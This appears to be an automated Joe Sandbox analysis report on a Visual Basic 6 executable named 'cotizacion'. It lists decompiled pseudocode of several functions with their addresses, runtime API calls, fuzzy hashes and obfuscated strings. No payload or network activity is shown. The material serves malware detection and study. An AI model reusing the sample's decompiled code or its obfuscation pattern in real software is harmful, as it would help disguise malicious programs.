Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID: __vba$Free$CheckHresult$Move$ChkstkNew2$#616
String ID:
API String ID: 5717343-0
Opcode ID: b312777a6a2c74bd355e92598397699991d1f746bda8897df859951f126d633b
Instruction ID: 8f4464b75a1b5f6fe8e517e75f37dee103aa163f3c47c46435fe1af8cb9ea565
Opcode Fuzzy Hash: b312777a6a2c74bd355e92598397699991d1f746bda8897df859951f126d633b
Instruction Fuzzy Hash: B971D171D40218AFDF00EF95D885BDEBBB1BF08704F20442AF505BB2A1DBB96985DB58

Uniqueness

Uniqueness Score: -1.00%

Function 004155F9, Relevance: 25.7, APIs: 17, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E004155F9(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				void* _v48;
				signed int _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				char* _v76;
				char _v84;
				intOrPtr* _v104;
				signed int _v108;
				intOrPtr* _v112;
				signed int _v116;
				signed int _v124;
				signed int _v128;
				intOrPtr* _v132;
				signed int _v136;
				signed int _v140;
				intOrPtr* _v144;
				signed int _v148;
				char* _t78;
				char* _t79;
				signed int _t85;
				signed int _t92;
				signed int _t98;
				intOrPtr _t118;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t118;
				L004016F0();
				_v12 = _t118;
				_v8 = 0x401570;
				_push(0x4118e4);
				L004017F2();
				if(0x80 != 2) {
					if( *0x4183d8 != 0) {
						_v132 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4116d4);
						L004018C4();
						_v132 = 0x4183d8;
					}
					_v104 =  *_v132;
					_t92 =  *((intOrPtr*)( *_v104 + 0x1c))(_v104,  &_v48);
					asm("fclex");
					_v108 = _t92;
					if(_v108 >= 0) {
						_v136 = _v136 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x4116c4);
						_push(_v104);
						_push(_v108);
						L00401906();
						_v136 = _t92;
					}
					_v112 = _v48;
					_v76 = 0x80020004;
					_v84 = 0xa;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t98 =  *((intOrPtr*)( *_v112 + 0x54))(_v112, 0x10,  &_v52);
					asm("fclex");
					_v116 = _t98;
					if(_v116 >= 0) {
						_v140 = _v140 & 0x00000000;
					} else {
						_push(0x54);
						_push(0x411818);
						_push(_v112);
						_push(_v116);
						L00401906();
						_v140 = _t98;
					}
					_v124 = _v52;
					_v52 = _v52 & 0x00000000;
					_v60 = _v124;
					_v68 = 9;
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v40);
					L0040191E();
					L004018AC();
					L00401912();
				}
				_v76 =  &_v24;
				_v84 = 0x6003;
				_t78 =  &_v84;
				_push(_t78);
				L0040185E();
				if(_t78 != 0xffff) {
					if( *0x4183d8 != 0) {
						_v144 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4116d4);
						L004018C4();
						_v144 = 0x4183d8;
					}
					_v104 =  *_v144;
					_t85 =  *((intOrPtr*)( *_v104 + 0x48))(_v104, 0x43,  &_v44);
					asm("fclex");
					_v108 = _t85;
					if(_v108 >= 0) {
						_v148 = _v148 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x4116c4);
						_push(_v104);
						_push(_v108);
						L00401906();
						_v148 = _t85;
					}
					_v128 = _v44;
					_v44 = _v44 & 0x00000000;
					L00401882();
				}
				_v36 = 0x76e8d350;
				_v32 = 0x5af4;
				_push(0x415847);
				_t79 =  &_v24;
				_push(_t79);
				_push(0);
				L00401858();
				L00401924();
				L004018AC();
				return _t79;
			}

0x004155fe
0x00415609
0x0041560a
0x00415616
0x0041561e
0x00415621
0x00415628
0x0041562d
0x00415635
0x00415642
0x0041565c
0x00415644
0x00415644
0x00415649
0x0041564e
0x00415653
0x00415653
0x00415668
0x00415677
0x0041567a
0x0041567c
0x00415683
0x0041569f
0x00415685
0x00415685
0x00415687
0x0041568c
0x0041568f
0x00415692
0x00415697
0x00415697
0x004156a9
0x004156ac
0x004156b3
0x004156c1
0x004156cb
0x004156cc
0x004156cd
0x004156ce
0x004156d7
0x004156da
0x004156dc
0x004156e3
0x004156ff
0x004156e5
0x004156e5
0x004156e7
0x004156ec
0x004156ef
0x004156f2
0x004156f7
0x004156f7
0x00415709
0x0041570c
0x00415713
0x00415716
0x0041571d
0x00415720
0x0041572a
0x0041572b
0x0041572c
0x0041572d
0x0041572e
0x00415730
0x00415733
0x0041573b
0x00415743
0x00415743
0x0041574b
0x0041574e
0x00415755
0x00415758
0x00415759
0x00415762
0x0041576f
0x0041578c
0x00415771
0x00415771
0x00415776
0x0041577b
0x00415780
0x00415780
0x0041579e
0x004157af
0x004157b2
0x004157b4
0x004157bb
0x004157d7
0x004157bd
0x004157bd
0x004157bf
0x004157c4
0x004157c7
0x004157ca
0x004157cf
0x004157cf
0x004157e1
0x004157e4
0x004157ee
0x004157ee
0x004157f3
0x004157fa
0x00415801
0x0041582b
0x0041582e
0x0041582f
0x00415831
0x00415839
0x00415841
0x00415846

APIs

__vbaChkstk.MSVBVM60(?,004016F6), ref: 00415616
__vbaLenBstrB.MSVBVM60(004118E4,?,?,?,?,004016F6), ref: 0041562D
__vbaNew2.MSVBVM60(004116D4,004183D8,004118E4,?,?,?,?,004016F6), ref: 0041564E
__vbaHresultCheckObj.MSVBVM60(00000000,?,004116C4,0000001C), ref: 00415692
__vbaChkstk.MSVBVM60(?), ref: 004156C1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411818,00000054), ref: 004156F2
__vbaChkstk.MSVBVM60(00000000,?,00411818,00000054), ref: 00415720
__vbaLateIdSt.MSVBVM60(?,00000000), ref: 00415733
__vbaFreeObj.MSVBVM60(?,00000000), ref: 0041573B
__vbaFreeVar.MSVBVM60(?,00000000), ref: 00415743
#556.MSVBVM60(00006003,?,?,?,?,?,?,?,?,?,?,?,?,004118E4), ref: 00415759
__vbaNew2.MSVBVM60(004116D4,004183D8,00006003,?,?,?,?,?,?,?,?,?,?,?,?,004118E4), ref: 0041577B
__vbaHresultCheckObj.MSVBVM60(00000000,?,004116C4,00000048), ref: 004157CA
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00006003), ref: 004157EE
__vbaAryDestruct.MSVBVM60(00000000,?,00415847,00006003), ref: 00415831
__vbaFreeStr.MSVBVM60(00000000,?,00415847,00006003), ref: 00415839
__vbaFreeObj.MSVBVM60(00000000,?,00415847,00006003), ref: 00415841

Memory Dump Source

Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID: __vba$Free$CheckChkstkHresult$New2$#556BstrDestructLateMove
String ID:
API String ID: 3585757769-0
Opcode ID: 1bc3f23d27bc18051016bf105cce639e129d614fd4fb557d0326c44647df8c7c
Instruction ID: 830a32c4f70d586142cf86c449b63fd90b9382ae0113b82d1eedd5175942df70
Opcode Fuzzy Hash: 1bc3f23d27bc18051016bf105cce639e129d614fd4fb557d0326c44647df8c7c
Instruction Fuzzy Hash: 3B610171D00708DFDB10EF94C886BDEBBB4BB08704F60402AE518BB2A1DBB95985DF58

Uniqueness

Uniqueness Score: -1.00%

Function 004160F5, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E004160F5(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				long long _v32;
				void* _v36;
				char _v52;
				char _v68;
				char* _v92;
				intOrPtr _v100;
				intOrPtr _v108;
				char _v116;
				void* _v120;
				signed int _v124;
				signed int _v128;
				intOrPtr* _v132;
				signed int _v136;
				signed long long _v144;
				signed int _v148;
				intOrPtr* _v152;
				signed int _v156;
				signed int _v160;
				signed int _t66;
				signed int _t69;
				signed int _t75;
				signed int _t80;
				short _t81;
				signed int _t84;
				char* _t87;
				intOrPtr _t94;
				intOrPtr* _t95;
				signed long long _t105;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t94;
				L004016F0();
				_v12 = _t94;
				_v8 = 0x401630;
				_v92 = L"01/01/01";
				_v100 = 8;
				_t87 =  &_v52;
				L004018A0();
				_push( &_v52);
				_push( &_v68);
				L004017C2();
				_v108 = 0x7d1;
				_v116 = 0x8002;
				_push( &_v68);
				_t66 =  &_v116;
				_push(_t66);
				L00401828();
				_v124 = _t66;
				_push( &_v68);
				_push( &_v52);
				_push(2);
				L00401942();
				_t95 = _t94 + 0xc;
				_t69 = _v124;
				if(_t69 != 0) {
					_push(_t87);
					_v52 =  *0x401628;
					_t105 =  *0x401620 *  *0x401618;
					if( *0x418000 != 0) {
						_push( *0x401614);
						_push( *0x401610);
						L00401714();
					} else {
						_t105 = _t105 /  *0x401610;
					}
					_v144 = _t105;
					 *_t95 = _v144;
					_v68 =  *0x401608;
					L0040183A();
					 *_t95 =  *0x4015f8;
					 *_t95 =  *0x4015f4;
					 *_t95 =  *0x4015f0;
					_t84 =  *((intOrPtr*)( *_a4 + 0x2c0))(_a4, 0x1c2, _t87, _t87, _t87, _t69, _t87, _t87);
					asm("fclex");
					_v124 = _t84;
					if(_v124 >= 0) {
						_v148 = _v148 & 0x00000000;
					} else {
						_push(0x2c0);
						_push(0x41017c);
						_push(_a4);
						_push(_v124);
						L00401906();
						_v148 = _t84;
					}
				}
				if( *0x4183d8 != 0) {
					_v152 = 0x4183d8;
				} else {
					_push(0x4183d8);
					_push(0x4116d4);
					L004018C4();
					_v152 = 0x4183d8;
				}
				_v124 =  *_v152;
				_t75 =  *((intOrPtr*)( *_v124 + 0x14))(_v124,  &_v36);
				asm("fclex");
				_v128 = _t75;
				if(_v128 >= 0) {
					_v156 = _v156 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4116c4);
					_push(_v124);
					_push(_v128);
					L00401906();
					_v156 = _t75;
				}
				_v132 = _v36;
				_t80 =  *((intOrPtr*)( *_v132 + 0x108))(_v132,  &_v120);
				asm("fclex");
				_v136 = _t80;
				if(_v136 >= 0) {
					_v160 = _v160 & 0x00000000;
				} else {
					_push(0x108);
					_push(0x411840);
					_push(_v132);
					_push(_v136);
					L00401906();
					_v160 = _t80;
				}
				_t81 = _v120;
				_v24 = _t81;
				L004018AC();
				_v32 =  *0x4015e8;
				asm("wait");
				_push(0x41634a);
				return _t81;
			}

0x004160fa
0x00416105
0x00416106
0x00416112
0x0041611a
0x0041611d
0x00416124
0x0041612b
0x00416135
0x00416138
0x00416140
0x00416144
0x00416145
0x0041614a
0x00416151
0x0041615b
0x0041615c
0x0041615f
0x00416160
0x00416165
0x0041616c
0x00416170
0x00416171
0x00416173
0x00416178
0x0041617b
0x00416181
0x0041618d
0x0041618e
0x00416197
0x004161a4
0x004161ae
0x004161b4
0x004161ba
0x004161a6
0x004161a6
0x004161a6
0x004161bf
0x004161cc
0x004161d6
0x004161df
0x004161ec
0x004161f6
0x00416200
0x00416210
0x00416216
0x00416218
0x0041621f
0x0041623e
0x00416221
0x00416221
0x00416226
0x0041622b
0x0041622e
0x00416231
0x00416236
0x00416236
0x0041621f
0x0041624c
0x00416269
0x0041624e
0x0041624e
0x00416253
0x00416258
0x0041625d
0x0041625d
0x0041627b
0x0041628a
0x0041628d
0x0041628f
0x00416296
0x004162b2
0x00416298
0x00416298
0x0041629a
0x0041629f
0x004162a2
0x004162a5
0x004162aa
0x004162aa
0x004162bc
0x004162cb
0x004162d1
0x004162d3
0x004162e0
0x00416302
0x004162e2
0x004162e2
0x004162e7
0x004162ec
0x004162ef
0x004162f5
0x004162fa
0x004162fa
0x00416309
0x0041630d
0x00416314
0x0041631f
0x00416322
0x00416323
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004016F6), ref: 00416112
__vbaVarDup.MSVBVM60 ref: 00416138
#553.MSVBVM60(?,?), ref: 00416145
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 00416160
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 00416173
_adj_fdiv_m64.MSVBVM60 ref: 004161BA
__vbaFpI4.MSVBVM60 ref: 004161DF
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041017C,000002C0), ref: 00416231
__vbaNew2.MSVBVM60(004116D4,004183D8), ref: 00416258
__vbaHresultCheckObj.MSVBVM60(00000000,?,004116C4,00000014), ref: 004162A5
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411840,00000108), ref: 004162F5
__vbaFreeObj.MSVBVM60(00000000,?,00411840,00000108), ref: 00416314

Strings

01/01/01, xrefs: 00416124

Memory Dump Source

Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID: __vba$CheckHresult$Free$#553ChkstkListNew2_adj_fdiv_m64
String ID: 01/01/01
API String ID: 2139296166-1279165767
Opcode ID: fd7fd0da682212b04374a8fdc3f259e0dc58f230250cc061a36b82e0e2382039
Instruction ID: 0749edf5dd989642edaba268ad58e425029443c97fbea2e8b621835c9ac8a6f5
Opcode Fuzzy Hash: fd7fd0da682212b04374a8fdc3f259e0dc58f230250cc061a36b82e0e2382039
Instruction Fuzzy Hash: 96515671900218EFDB10AFA0CD49BEDBBB8FB08704F1444AEE145B71A2CB799994DF18

Uniqueness

Uniqueness Score: -1.00%

Function 004165FA, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E004165FA(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				signed int _v36;
				void* _v40;
				char _v56;
				intOrPtr* _v60;
				signed int _v64;
				intOrPtr* _v68;
				signed int _v72;
				intOrPtr _v84;
				intOrPtr* _v88;
				signed int _v92;
				signed int _v96;
				signed int _t60;
				signed int _t65;
				signed int _t66;
				void* _t78;
				void* _t80;
				intOrPtr _t81;

				_t81 = _t80 - 0xc;
				 *[fs:0x0] = _t81;
				L004016F0();
				_v16 = _t81;
				_v12 = 0x401650;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x48,  *[fs:0x0], 0x4016f6, _t78);
				_push(L"7:7:7");
				_push( &_v56);
				L004017AA();
				_push( &_v56);
				L004017B0();
				L00401882();
				L00401912();
				if( *0x4183d8 != 0) {
					_v88 = 0x4183d8;
				} else {
					_push(0x4183d8);
					_push(0x4116d4);
					L004018C4();
					_v88 = 0x4183d8;
				}
				_v60 =  *_v88;
				_t60 =  *((intOrPtr*)( *_v60 + 0x14))(_v60,  &_v40);
				asm("fclex");
				_v64 = _t60;
				if(_v64 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4116c4);
					_push(_v60);
					_push(_v64);
					L00401906();
					_v92 = _t60;
				}
				_v68 = _v40;
				_t65 =  *((intOrPtr*)( *_v68 + 0xe0))(_v68,  &_v36);
				asm("fclex");
				_v72 = _t65;
				if(_v72 >= 0) {
					_v96 = _v96 & 0x00000000;
				} else {
					_push(0xe0);
					_push(0x411840);
					_push(_v68);
					_push(_v72);
					L00401906();
					_v96 = _t65;
				}
				_t66 = _v36;
				_v84 = _t66;
				_v36 = _v36 & 0x00000000;
				L00401882();
				L004018AC();
				_push(0x416757);
				L00401924();
				L00401924();
				return _t66;
			}

0x004165fd
0x0041660c
0x00416616
0x0041661e
0x00416621
0x00416628
0x00416637
0x0041663a
0x00416642
0x00416643
0x0041664b
0x0041664c
0x00416656
0x0041665e
0x0041666a
0x00416684
0x0041666c
0x0041666c
0x00416671
0x00416676
0x0041667b
0x0041667b
0x00416690
0x0041669f
0x004166a2
0x004166a4
0x004166ab
0x004166c4
0x004166ad
0x004166ad
0x004166af
0x004166b4
0x004166b7
0x004166ba
0x004166bf
0x004166bf
0x004166cb
0x004166da
0x004166e0
0x004166e2
0x004166e9
0x00416705
0x004166eb
0x004166eb
0x004166f0
0x004166f5
0x004166f8
0x004166fb
0x00416700
0x00416700
0x00416709
0x0041670c
0x0041670f
0x00416719
0x00416721
0x00416726
0x00416749
0x00416751
0x00416756

APIs

__vbaChkstk.MSVBVM60(?,004016F6), ref: 00416616
#541.MSVBVM60(?,7:7:7,?,?,?,?,004016F6), ref: 00416643
__vbaStrVarMove.MSVBVM60(?,?,7:7:7,?,?,?,?,004016F6), ref: 0041664C
__vbaStrMove.MSVBVM60(?,?,7:7:7,?,?,?,?,004016F6), ref: 00416656
__vbaFreeVar.MSVBVM60(?,?,7:7:7,?,?,?,?,004016F6), ref: 0041665E
__vbaNew2.MSVBVM60(004116D4,004183D8,?,?,7:7:7,?,?,?,?,004016F6), ref: 00416676
__vbaHresultCheckObj.MSVBVM60(00000000,?,004116C4,00000014), ref: 004166BA
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411840,000000E0), ref: 004166FB
__vbaStrMove.MSVBVM60(00000000,?,00411840,000000E0), ref: 00416719
__vbaFreeObj.MSVBVM60(00000000,?,00411840,000000E0), ref: 00416721
__vbaFreeStr.MSVBVM60(00416757), ref: 00416749
__vbaFreeStr.MSVBVM60(00416757), ref: 00416751

Strings

7:7:7, xrefs: 0041663A

Memory Dump Source

Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID: __vba$Free$Move$CheckHresult$#541ChkstkNew2
String ID: 7:7:7
API String ID: 1992979026-4135912237
Opcode ID: 39349affca0f1e4b88b95ed7bd177ca2f0ec529d87065c01217f940d73e22562
Instruction ID: 672f5ca991def1a5797b0613760199d26e078263c0d7892c909fb35a577cb16c
Opcode Fuzzy Hash: 39349affca0f1e4b88b95ed7bd177ca2f0ec529d87065c01217f940d73e22562
Instruction Fuzzy Hash: 0741E571D00248AFCB00EFD5C985BDEBBB4BF04708F20442AF105B72A1DB79A985DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00415868, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00415868(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char* _v44;
				intOrPtr _v52;
				intOrPtr _v76;
				intOrPtr _v84;
				short _v104;
				char _v108;
				short _v112;
				short _t30;
				short _t36;
				void* _t47;
				void* _t49;
				intOrPtr _t50;

				_t50 = _t49 - 0xc;
				 *[fs:0x0] = _t50;
				L004016F0();
				_v16 = _t50;
				_v12 = 0x401588;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x60,  *[fs:0x0], 0x4016f6, _t47);
				L004017EC();
				_v108 = 0x98e72e79;
				_push( &_v108);
				_push(L"Bride6");
				_t30 =  &_v36;
				_push(_t30);
				L004018D6();
				_push(_t30);
				E00411250();
				_v104 = _t30;
				L004018D0();
				asm("sbb eax, eax");
				_v112 =  ~( ~(_v104 - 0x3b15e5) + 1);
				L00401924();
				_t36 = _v112;
				if(_t36 != 0) {
					_v44 = L"Spndingsfelts7";
					_v52 = 8;
					_v76 = 0x98e72e79;
					_v84 = 3;
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t36 = 0x10;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(2);
					_push(L"IyvnZebsGDOjb7EbCSqY69I5dIvuQxd72");
					_push(_v32);
					L004018FA();
				}
				_v28 =  *0x401580;
				asm("wait");
				_push(0x41596c);
				L004018AC();
				return _t36;
			}

0x0041586b
0x0041587a
0x00415884
0x0041588c
0x0041588f
0x00415896
0x004158a5
0x004158a8
0x004158ad
0x004158b7
0x004158b8
0x004158bd
0x004158c0
0x004158c1
0x004158c6
0x004158c7
0x004158cc
0x004158d0
0x004158e0
0x004158e5
0x004158ec
0x004158f1
0x004158f7
0x004158f9
0x00415900
0x00415907
0x0041590e
0x00415915
0x00415918
0x00415922
0x00415923
0x00415924
0x00415925
0x00415928
0x00415929
0x00415933
0x00415934
0x00415935
0x00415936
0x00415937
0x00415939
0x0041593e
0x00415941
0x00415946
0x0041594f
0x00415952
0x00415953
0x00415966
0x0041596b

APIs

__vbaChkstk.MSVBVM60(?,004016F6), ref: 00415884
#598.MSVBVM60(?,?,?,?,004016F6), ref: 004158A8
__vbaStrToAnsi.MSVBVM60(?,Bride6,98E72E79), ref: 004158C1
__vbaSetSystemError.MSVBVM60(00000000,?,Bride6,98E72E79), ref: 004158D0
__vbaFreeStr.MSVBVM60(00000000,?,Bride6,98E72E79), ref: 004158EC
__vbaChkstk.MSVBVM60(00000000,?,Bride6,98E72E79), ref: 00415918
__vbaChkstk.MSVBVM60(00000000,?,Bride6,98E72E79), ref: 00415929
__vbaLateMemCall.MSVBVM60(?,IyvnZebsGDOjb7EbCSqY69I5dIvuQxd72,00000002,00000000,?,Bride6,98E72E79), ref: 00415941
__vbaFreeObj.MSVBVM60(0041596C,00000000,?,Bride6,98E72E79), ref: 00415966

Strings

IyvnZebsGDOjb7EbCSqY69I5dIvuQxd72, xrefs: 00415939
Spndingsfelts7, xrefs: 004158F9
Bride6, xrefs: 004158B8

Memory Dump Source

Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID: __vba$Chkstk$Free$#598AnsiCallErrorLateSystem
String ID: Bride6$IyvnZebsGDOjb7EbCSqY69I5dIvuQxd72$Spndingsfelts7
API String ID: 3513344361-1204764921
Opcode ID: 017978f52b80b8a0b1dbbb6656f96350efd2f0c546d435f61f5ced2f29a04e14
Instruction ID: 772f03a7a65fdd954cff4fd6181e8b7b18f5a58d2c93d9e83ea2b97581f5bd14
Opcode Fuzzy Hash: 017978f52b80b8a0b1dbbb6656f96350efd2f0c546d435f61f5ced2f29a04e14
Instruction Fuzzy Hash: F8218D71D10308EACF00EFA5CC46BDEBBB9AF05704F10442AF400BB1A1D7B99944CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00415E06, Relevance: 19.6, APIs: 13, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00415E06(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed int _v52;
				signed int _v60;
				intOrPtr* _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _t59;
				signed int _t64;
				signed int _t65;
				intOrPtr _t81;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t81;
				_push(0x38);
				L004016F0();
				_v12 = _t81;
				_v8 = 0x4015c8;
				L004018F4();
				if( *0x4183d8 != 0) {
					_v64 = 0x4183d8;
				} else {
					_push(0x4183d8);
					_push(0x4116d4);
					L004018C4();
					_v64 = 0x4183d8;
				}
				_v40 =  *_v64;
				_t59 =  *((intOrPtr*)( *_v40 + 0x14))(_v40,  &_v36);
				asm("fclex");
				_v44 = _t59;
				if(_v44 >= 0) {
					_v68 = _v68 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4116c4);
					_push(_v40);
					_push(_v44);
					L00401906();
					_v68 = _t59;
				}
				_v48 = _v36;
				_t64 =  *((intOrPtr*)( *_v48 + 0xd8))(_v48,  &_v32);
				asm("fclex");
				_v52 = _t64;
				if(_v52 >= 0) {
					_v72 = _v72 & 0x00000000;
				} else {
					_push(0xd8);
					_push(0x411840);
					_push(_v48);
					_push(_v52);
					L00401906();
					_v72 = _t64;
				}
				_t65 = _v32;
				_v60 = _t65;
				_t35 =  &_v32;
				 *_t35 = _v32 & 0x00000000;
				L00401882();
				L004018AC();
				L004017C8();
				L0040193C();
				asm("fcomp qword [0x401548]");
				asm("fnstsw ax");
				asm("sahf");
				if( *_t35 != 0) {
					L0040183A();
					_t65 =  *((intOrPtr*)( *_a4 + 0x64))(_a4, _t65);
					asm("fclex");
					_v40 = _t65;
					if(_v40 >= 0) {
						_v76 = _v76 & 0x00000000;
					} else {
						_push(0x64);
						_push(0x41017c);
						_push(_a4);
						_push(_v40);
						L00401906();
						_v76 = _t65;
					}
				}
				asm("wait");
				_push(0x415f83);
				L00401924();
				L00401924();
				return _t65;
			}

0x00415e0b
0x00415e16
0x00415e17
0x00415e1e
0x00415e21
0x00415e29
0x00415e2c
0x00415e39
0x00415e45
0x00415e5f
0x00415e47
0x00415e47
0x00415e4c
0x00415e51
0x00415e56
0x00415e56
0x00415e6b
0x00415e7a
0x00415e7d
0x00415e7f
0x00415e86
0x00415e9f
0x00415e88
0x00415e88
0x00415e8a
0x00415e8f
0x00415e92
0x00415e95
0x00415e9a
0x00415e9a
0x00415ea6
0x00415eb5
0x00415ebb
0x00415ebd
0x00415ec4
0x00415ee0
0x00415ec6
0x00415ec6
0x00415ecb
0x00415ed0
0x00415ed3
0x00415ed6
0x00415edb
0x00415edb
0x00415ee4
0x00415ee7
0x00415eea
0x00415eea
0x00415ef4
0x00415efc
0x00415f07
0x00415f0c
0x00415f11
0x00415f17
0x00415f19
0x00415f1a
0x00415f22
0x00415f30
0x00415f33
0x00415f35
0x00415f3c
0x00415f55
0x00415f3e
0x00415f3e
0x00415f40
0x00415f45
0x00415f48
0x00415f4b
0x00415f50
0x00415f50
0x00415f3c
0x00415f59
0x00415f5a
0x00415f75
0x00415f7d
0x00415f82

APIs

__vbaChkstk.MSVBVM60(?,004016F6), ref: 00415E21
__vbaStrCopy.MSVBVM60(?,?,?,?,004016F6), ref: 00415E39
__vbaNew2.MSVBVM60(004116D4,004183D8,?,?,?,?,004016F6), ref: 00415E51
__vbaHresultCheckObj.MSVBVM60(00000000,?,004116C4,00000014), ref: 00415E95
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411840,000000D8), ref: 00415ED6
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00415EF4
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00415EFC
__vbaFPInt.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00415F07
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00415F0C
__vbaFpI4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00415F22
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041017C,00000064), ref: 00415F4B
__vbaFreeStr.MSVBVM60(00415F83,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00415F75
__vbaFreeStr.MSVBVM60(00415F83,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00415F7D

Memory Dump Source

Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID: __vba$CheckFreeHresult$ChkstkCopyMoveNew2
String ID:
API String ID: 1785689987-0
